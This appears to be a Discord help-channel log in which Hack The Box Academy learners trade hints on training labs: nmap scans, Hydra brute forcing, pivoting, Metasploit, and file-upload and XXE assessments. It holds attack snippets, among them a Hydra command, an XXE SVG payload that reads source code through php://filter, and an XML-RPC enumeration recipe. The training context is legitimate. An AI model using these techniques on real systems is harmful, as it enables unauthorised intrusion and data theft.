@rustic sage using -p- and not using any othe flag as -min-rate or -T4 , and if you are using normal three hand shake tcp imagine for 65535 ports...

https://tenor.com/view/facepalm-annoyed-stöhn-oh-no-oh-nein-gif-24943313

XDDDD

I appreciate you helping me win the war against my own mind. XD

.

@misty mural 😄 no problem, imagine my face when I was taking the wrong IP in the first host... Same feeling XD

I understand. I thought I had to make more searches on nmap parameters to answer the module's final question using -p- . The problem for this module is : if the spawnmachine has his top TCP open port out of the range of the default values for -Pn, it will be impossible to find it due to the fact that -p- is too long to run. Because when asking to do a full TCP scan... aren't we supposed to scan all port (-p-) ....? Anyway ... I'm now going to next module ... 😀 Thx for helping @misty mural @torn steppe @fathom pendant @proud pine

I am having a surprisingly hard time with Attacking Common services - FTP, I am stuck on the 2nd question where I need to enter the username that I have found.
I used Hydra and the 2 lists that was provided in this module and I got a successful response. But when I submit the username as an answer it does not work. And I can't connect to the ssh service as required in the last question with the username and password that hydra found.

hydra -L 'users.list' -P 'pws.list' ftp://IP -s PORT
[PORT][ftp] host: IP   login: j___   password: 3_______
.....
ssh j____@IP
 j____@IP: Permission denied (publickey).

I don't know but, maybe the mistake is that are you trying to login via ssh with a ftp credentials??

I dont reach this module yet but maybe the credentials are different between services and aplications

The questions for that section

ahms

thx for the picture

Yeah, this one is a bit weird. I tried to find the port with a -p- nmap scan but it didnt show up until the 4th reset

what port is running ssh service?

22, the standard one

I need some help with server side attack module, skill assessment. It will be great help if someone could drop some solutions.

how to upload screenshots of the assessment ??

hello all

AD Enumeration & Attacks - Skills Assessment Part II

• 1 Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

i was able to get a meterpreter session and ran "getsystem" and found the answer to the question

but am not able to do hashdump to solve the next quistion

• 1 Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

did i approach the first question in a wrong way ? please give me hints i feel like am lost

**Firewall and IDS/IPS Evasion - Hard Lab **
Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.

I found the port but not sure how to get the flag.

try connecting to the service, or using one of the nmap flags

Connecting is the way to go

@fathom pendant how to get a role of HTB community contributor

#📣-announcements message no idea when i will get my

by contributing to the community

ohk

"Credential Hunting in Linux" - Password Attacks

I tried mutating the password without success when doing hydra. Any tips please? 🥺

try lowercase

If you live here, so to speak, then this role comes automatically 🤪

I added l (all to lowercase) to the custom.rule and tried, didnt work 😢

Username 😶

haha awesome thank you!

i found a bug

yo for the people who are used to use ligolo

I just got access to this machine, to access to the ports listening

I just connect with agent and I add 10.129.142.228 to the route?

If you do an ip a, you should see the CIDR notation for the subnet, it's basically just that. Something along the lines of 10.129.142.0/24 in this case I think

Ligolo is a bit overkill here though, just do some local port forwarding with the -L flag in SSH

I tried to bruteforce SSH with the password using the custom rule provided, however it didnt work for the user ||Kira||

I am having trouble RDPeeing into the windows machine :

https://academy.hackthebox.com/module/22/section/290

What I typed out: xfreerdp /v:10.129.42.188 /u:james.cross /p:Academy_Student! /dynamic-resolution

The password I used was 'Academy_Student!' and it doesn't work

Try logging in on your phone

the bug go away when i make the window smaller and came back when i fullscreen even relode save

it is a machine not a lab

I just want access to the local ports

that's why I'm saying ligolo is overkill

so better use chisel in this case?

If you just need to access single ports on a remote machine, and there isn't a need to pivot further into the network, my go to is to SSH local port forward

I am www-data

I did revshell

ah that makes sense

You could upload a static copy of socat and use that, but yeah, I understand trying to use ligolo or chisel then if you really don't want to use anything else

I was thinking if I could setup the proxy with ligolo

and connecting to it I could have access to the ports

but I did wget and the machine died lol I had to restart it

.

I think you should, and if not, pretty sure ligolo has an option to do some port redirection which is functionally the same as what I was saying

Did you put single quotes around the password?

xfreerdp /v:10.129.42.188 /u:james.cross /p:'Academy_Student!' /dynamic-resolution

The ! by itself usually gets interpreted differently by the shell

I will try it

Oh I see. I will try that?

the machine didn't crash now

I will try nmap now to check

probably DM at this point, feels like we're clogging up this channel :)

it crashed anyways I will just use chisel

That still didn't work for me

u writing the password wrong

Write it like this : xfreerdp /v:10.129.42.188 /u:james.cross /p:'Academy_Student!' /dynamic-resolution

I can't see the module because I don't have it unlocked so I don't know what the correct password is 🙃

u don't need rdp for that

but I don't know what the module teaches u

how do I access powershell then from a linux tool

*linux host

check the ports open

but if I remember well when u have to login with rdp they tell 'RDP to IP with user "" and password "" '

I think it's an older module, so things might be different now

he can check the password policy with other tools anyways

This is the Active Directory LDAP module, the whole point is to work with LDAP

The xfreerdp command, as far as I know, is correct. If you are sure you need to use RDP, maybe try something else like Remmina? If that doesn't work, it could be possible that you're just supposed to query LDAP remotely, or maybe even sign in with winrm.

I haven't done this module, nor have I unlocked it, so I can't say for certain how they do or don't want you to do this.

I got it with chisel

hello, did you manage to figure it out?

I tried this and it didn't work. ' /opt/windapsearch/windapsearch.py --dc-ip 10.129.42.188 -d INLANEFREIGHT.LOCAL -u james.cross -p 'Academy_Student!' --custom '(objectClass=domainDNS)' --attrs pwdHistoryLength
'

Anyone have done The Corporate Osint : Cloud Storage Section. I need help for finding the bucket name of AWS that the site use

Hey i'm practicing in the lab assessment in the pivoting module. Once i pivot on the third machine it start to be a bit confusing, and it's hard to keep the wires connected. Could someone give me a hand/advices on how to keep the flow ?

Look at everything. ||Also the source code||

I just want to say that I've been pointlessly stuck on this question for at least an hour, and it's a very bad question from which you learn almost nothing of value. That's it.

@acoustic owl Still on inlanefreight.com ?

on the nibbles challenge i get "sudo: no tty present and no askpass program specified" after modifying the monitor.sh file and running it, why?

You probably need to stabilize your shell, follow the instructions in the section. They walk you through exactly what to do.

Just use find or locate. If you’ve been stuck on it for an hour, it has value in teaching you how to find files on your system.

using Burp, send a POST request to the server on http://serverip:port/xmlrpc.php with below xml content
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Now create a Wordlist by collecting all the methods returned in the response and make a wordlist
Now use Burp intruder nad replace the system.listMethods with the wordlist and start the attack.
The resulting no. of possible method calls to your target is the answer.

@acoustic owl Thanks!!!

hi i'm having some issues with last section of getting started module. I am clicking on the file upload button but its not letting me upload a file

I'm assuming its a file upload vulnerability much like nibbles earlier in the same section

"upload files and/or images" button does nothing

decrypting the password and logging in was not too difficult.

I mean it took a minute for me to realize it was a hash

but I totally get it

but when I don't get is whether or not the fact that the box I'm currently doing is right after nibbles in same section on academy is trying to trick me into thinking its also a file upload issue

because I'm looking at all of these hidden pages and I am starting to question if its purposely leading me towards file uploads when the real issue is something else

can someone help me out here?

hi there is it only possible to buy cubes with credit card and not with paypal ?

Can I find a team were we join in on #710108839063846964 Htb CTFs ….. open for invites 😃

Hydra doesn't update with apt. I went to the github and did the make install but it still doesn't work for smb. Does anyone know how to fix this?

Lowercase 'k'

In case you can use crackmapexec for SMB

Yes

I believe PayPal is an option

But that sounds more like you should ask support on the website rather than discord

thx i did that a few mins ago 🙂

Can anyone help me with the initial foothold for the "Skills Assessment - File Upload Attacks" Module? I see the page html source code and have tried editing out the blacklist function, but I still can't upload anything other than .jpeg, .jpg, or .png. I've been able to get shell.php.jpg to upload, but I can't really do much from there. I've also tried fuzzing the parameters for LFI. When I fuzz for file extensions and file acceptance types, I get the same length code of 2044 for everything, so it is not really useful.

you can use xxe to view sensitive files such as the backend source code

I actually am able to upload arbitrary files now. I realized I needed to use Firefox to edit out the blacklist function. Can you give me a nudge as to how to view the sensitive files once I have uploaded the xxe-infected svg file? Thanks!

you can find the files u uploaded in an uploads directory, but details to that can only be found if u have first obtained the backend source code

I think that is where I am stuck. I used fuff to find the ||upload.php|| file, but I am not sure how to obtain it's source code. I tried using "php://...." in the parameters of the contact page in burp, but that is not working.

it's in the section under Limited File Uploads

Okay, I will read through that again. Thanks! So, am I supposed to upload the SVG file first, then access it to read the back-end source code? If so, how do I know where to look for the file?

the file will be uploaded yes, but you dont need to look for it as the contents of the back-end source code will be presented in the burp response in svg tags

if you do look for the file, you will see that it actually contains the payload u sent

I see. So far, I have not seen any svg tags in my burp responses. Is there a specific way I am supposed to be uploading it?

Here are my steps so far: Make test.svg file with ||<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php"> ]>
<svg>&xxe;</svg>|| then, edit out the blacklist function in Firefox, upload the file, catch it in Burp, send it to responder, and look for the response...but I do not see any svg tags in the response

since u found in your initial enumeration that only .jpg .jpeg and .png are allowed, you can try to upload that format but change its contents to the xxe payload. Note that even though u edited the blacklist function in Firefox, but that is only client-side validation, you dont know what they are doing in the backend yet

I think the part where I change the file's contents is what I am stuck on since the requests in the prior exercises had an obvious place to put in additional code (php or xxe code). I am not understanding how I am supposed to change the code with this type of request format. Do I just put the xxe code at the bottom of the request?

try to upload a legitimate .jpg file, intercept with burp, and then edit the request

Thanks, @umbral wigeon ! Should I focus on the parameters or on adding code to the request?

So I need some help

on which module

having trouble with greenshot.

I'm doing a post request on the web request module

but I don't know what flag I'm looking for

do I just need the session cookie?

I thought there was a hotkey to make a selection of what to capture, then it would auto load the editor so that you can add red arrows and etc. I'm having the hardest time. I'm pushing prntscrn, selecting, then right clicking green arrow in the right bottom tray, and clicking capture last region, which opens up the editor but the selection is now in the wrong spot.

hold on

got it

was litterally searching the wrong thing

Any nudges for Attacking Common services(easy). I'm stuck on trying to upload the CVE exploit. Ended up getting this.

Date:Sun, 30 Jun 2023 01:46:33 GMT
Server: Core FTP HTTP Server
Accept-Ranges: bytes
Connection: Keep-Alive
Content-type: application/octet-stream
Content-length: 5

I seem to have server connection issues

but everything else worked just fine for me until then

why

it happened again with a new server

and I got plenty of time

its A public docker instance

your internet could just be bad

¯_(ツ)_/¯

so do I just have to wait till tomorrow and hope for a better terminal?

happy now

not a better terminal, just keep trying

I only have one terminal per day

I do plan on getting VIP soon

soooo hopefully I'll have a better experience

Anyone available to DM with me about Skills Assessment - File Upload Attacks? I've been stuck on it all day. Thanks!

I just saw the green upload button...FML LOL!!! If you don't use the green square with the upwards arrow icon to upload, you won't get the full POST Request...I was using the blue submit button before.

guys and gals got a question related to adding an exploit to msfconsole ... I am on the shells & payload skills assessment and saw the exploit in question on the target machine but when i try to add it ... it does not show in the msf search result ... did the same thing on my own host and it worked fine so need to find out is something missing at my end or is this a tech issue

I couldn’t see it via search but when I manually typed “use exploit/path/to/file/filename” I was able to use it without searching first

interesting

it worked .. thanks for the suggestion. Wonder why this is the case

It probably builds a cache for searching at some point and you have to refresh it if you add something afterwards

Yes

i did do the updatedb and saw the counter go up but the search didnt work however the use with direct path to file worked

Can anyone nudge me on the final part of Skills Assessment - File Upload? I have found the source code, file upload directory, and renaming scheme. I have uploaded a regular jpg file and found it at the website with the new file name. For my file name, I am using ||shell.pht.jpg|| and also ||image/jpg||. I've been trying to add php code to the request, but so far have not gotten ?cmd=id to work. I've tried lots of Magic Bytes so far, including for jpg/jpeg.

Need a bit of clarification on crackmapexec ... I have tried crackmapexec rdp [target IP] -u [username] -p [password] and got false negative but when I try same credentials on xfreerdp /v: [target IP] /u: [username] /p: [password] it goes through ... why did I get false negative and how to overcome this?

Are the creds a local or domain account?

I haven't used the rdp mode on cme much, I wonder if it supports the same thing for SMB like --local-auth.

ooh not sure about that ... i did get the password from crackmap with smb to enumerate shares and i had the username and found the password

however i just tried to add --local-auth to crackmap for rdp and still got the false negative

if id works than the other simple commands should work ... did you try url encoding

You get a hit [+] using smb mode right? if you did get that hit without --local-auth then it's a domain account otherwise it's a local account.

I've had problems with rdp mode in the past too, part reason why I stopped using it.

whats your alternative ?

yes

Hi everyone, i a am new to htb and i am currently doing th get started module, i encounter an issue with msf. i try to exploit a vulnerability on the openssh service but i am asked to configure the 'session' parameter' however it seems i have no active session. i am using the VM provided by htb.
does anyone have a clue to help me solve this pb?

that exploit is definitely not the correct path forward

session refers to shells caught with metasploit already using other exploits or means. Because the exploit you selected is for s windows local privilege escalation, so it routes through an existing shell on the victim to run.

thanks @thorn urchin when i search exploit openssh it is the only one proposed though 😥

been awhile since Ive done the module, does it insist on an openssh vuln?

openssh has not had many remote exploits

it said to scan the services on open ports and for the target ip i was given i only had openssh on port 22. i am real beginner so i probably misunderstood something though.